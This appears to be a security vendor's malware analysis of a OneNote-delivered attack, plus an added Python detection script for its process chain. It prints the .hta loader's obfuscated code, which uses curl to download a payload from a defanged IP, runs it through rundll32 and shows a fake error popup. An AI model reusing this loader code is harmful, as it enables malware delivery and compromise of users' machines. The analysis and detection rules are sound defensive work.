On February 3rd, 2023, Todyl’s MXDR team received alerts about a suspicious file being launched from OneNote. Upon execution, Todyl’s Endpoint Security (EDR + NGAV) module prevented the behavior and all subsequent stages of the attack.
Recognizing the severity, our MXDR and Detection Engineering teams began testing in our lab environment. Running the Endpoint Security module in detect-only mode, we received multiple alerts for malicious activity:
Detection Timeline:
Upon running the OneNote file, the user receives instructions to execute an embedded file (Open[.]hta) within the OneNote document:
Within the .hta file, we found this encoded file:
Analyzing further, we identified the .hta file's execution mechanism:
<div
function sleep(millis){var date = new Date()
var curDate = null
do { curDate = new Date()
}while(curDate - date < millis)
}var shell = new ActiveXObject("wscript.shell")
/** var url = "https://google.com"
*/shell.run("curl.exe --output C:\\ProgramData\\a4aFOd5wh.png --url " + url, 0)
sleep(15000)
var shellap = new ActiveXObject("shell.application")
shellap.shellexecute("rundll32", "C:\\ProgramData\\a4aFOd5wh.png,Wind", "", "open", 3)
shell.Popup("This document is corrupted and could not be opened", 0, "Document Error", 16)
shell.run("taskkill /f /im mshta.exe", 0)
</div>
<script language="javascript">
var aPpcY2D6 = "5a29503a4909fcade36b1823e7cebcf5";
var akD8Sy = "HKCU\\SOFTWARE\\cqptlz\\ug9o\\b8kvyy";
function avlONjF(aD45uK)
{
return(document.getElementById(aD45uK).innerText);
}
</script>
<script language="vbscript">
Dim a9lAB
Set a9lAB = CreateObject("wscript.shell")
a9lAB.RegWrite akD8Sy, avlONjF("ap6oBZEfG"), "REG_SZ"
</script>
<script language="javascript">
var as4JIGMhX = a9lAB.regread(akD8Sy);
as4JIGMhX = as4JIGMhX.replace(/100&/g, "");
if(as4JIGMhX)
{
var avE9dmu = new Function("url", as4JIGMhX);
}
</script>
<script language="vbscript">
ay8b3d = "hxxp://172[.]96[.]137[.]149/72943[.]dat"
Call avE9dmu(ay8b3d)
a9lAB.RegDelete(akD8Sy)
</script>
After the .hta file runs, a curl command fetches 72943[.]dat from hxxp://172[.]96[.]137[.]149/72943[.]dat:
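As an added defender-side illustration (not code from the original post or from Todyl), the following Python scores process-creation events against the chain described above: OneNote spawning mshta.exe, mshta.exe running curl.exe to write into C:\ProgramData, rundll32 being handed a non-DLL extension plus an export name, and the closing taskkill of mshta.exe. The events are constructed Sysmon-style records, and the field names (pid, image, parent, cmd) are assumptions.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (not real telemetry), modelled on the
# chain in this post: OneNote -> mshta.exe -> curl.exe -> rundll32.exe -> taskkill.exe.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4388", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "cmd": r"mshta.exe C:\Users\u\AppData\Local\Temp\Open.hta"},
    {"pid": "4402", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmd": r"curl.exe --output C:\ProgramData\a4aFOd5wh.png --url hxxp://172[.]96[.]137[.]149/72943[.]dat"},
    {"pid": "4410", "image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmd": r"rundll32 C:\ProgramData\a4aFOd5wh.png,Wind"},
    {"pid": "4415", "image": r"C:\Windows\System32\taskkill.exe", "parent": r"C:\Windows\System32\mshta.exe",
     "cmd": "taskkill /f /im mshta.exe"},
    # Benign control: a user downloading a PDF from a shell should not trigger any rule.
    {"pid": "5000", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"curl.exe --output C:\Users\u\Downloads\report.pdf --url https://example.com/report.pdf"},
]

# Extensions rundll32 is normally handed; anything else (.png here) is a loader masquerade.
DLL_LIKE = {"dll", "cpl", "ocx", "ax", "drv"}
RUNDLL32_ARGS = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+)"?\s*,\s*(\w+)', re.I)
CURL_TO_PROGRAMDATA = re.compile(r'--output\s+"?[A-Za-z]:\\ProgramData\\', re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event satisfies (empty list if none)."""
    img, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmd"]
    hits = []
    if img == "mshta.exe" and parent == "onenote.exe":
        hits.append("onenote_spawns_mshta")          # stage 1: embedded .hta launched
    if img == "curl.exe" and parent == "mshta.exe" and CURL_TO_PROGRAMDATA.search(cmd):
        hits.append("mshta_curl_to_programdata")     # stage 2: payload dropped with fake extension
    m = RUNDLL32_ARGS.match(cmd)
    if img == "rundll32.exe" and m and m.group(1).rsplit(".", 1)[-1].lower() not in DLL_LIKE:
        hits.append("rundll32_non_dll_module")       # stage 3: .png loaded as a DLL, export called
    if img == "taskkill.exe" and parent == "mshta.exe" and re.search(r"/im\s+mshta\.exe", cmd, re.I):
        hits.append("mshta_self_terminate")          # stage 4: loader kills its own host process
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map pid -> matched rule names for every event that matched at least one rule."""
    return {e["pid"]: hits for e in events if (hits := match_rules(e))}
```

Calling `scan(SAMPLE_EVENTS)` flags the four staged processes and leaves the benign curl download untouched; any single hit is worth an alert, and two or more under the same mshta.exe parent reproduce the full chain from the post.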
At the time of writing, VirusTotal reports this IP as clean. There have been reports of additional files with similar activity: